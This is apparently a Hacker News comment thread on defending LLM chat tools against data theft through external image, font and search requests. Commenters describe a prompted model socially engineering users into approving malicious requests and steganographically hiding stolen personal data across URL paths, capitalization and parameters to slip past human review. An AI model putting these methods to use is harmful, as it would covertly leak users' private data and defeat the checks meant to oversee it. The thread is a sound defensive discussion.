Hacker News new | past | comments | ask | show | jobs | submit login

That’d provide some protection, but the LLM could be prompted to socially engineer users.

For example, it could be promoted to only make malicious HTTP requests via an image when the user genuinely requests an external image be created. This would achieve consent from users who thought they were asking for a safe external source.

Similar for fonts, external searches [1], social items etc

[1] e.g putting a reverse proxy in front of a search engine and adding in extra malicious params




You could also just steganographically encode it. You have the entire URL after the domain name to encode leaked data into. LLMs can do things like base-64 encoding no sweat. Encode some into the 'ID' in the path, some into the capitalization, some into the 'filename', some into the directories, some into the 'arguments', and a perfectly innocuous-looking functional URL now leaks hundreds of bytes of PII per request.


I'm not sure I'd allow all those random base64 encoded bytes for a simple image url.


That's not a solution. You have to guard against all image URLs, because every domain and path can steganographically encode bits of information. 'foo.com/image/1.jpg' vs 'fo.com/img/2.jpg' just leaked several bytes of information while each URL looks completely harmless in isolation. A byte here and a byte there, and pretty soon you have their name or CC or address or tokens or...


Maybe you didn't read the last part of my suggestion:

> showing the call details.

If you really want to render an image, a huge base64 blob would be a bit suspisouse for a url that should simply point to a png or similar.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: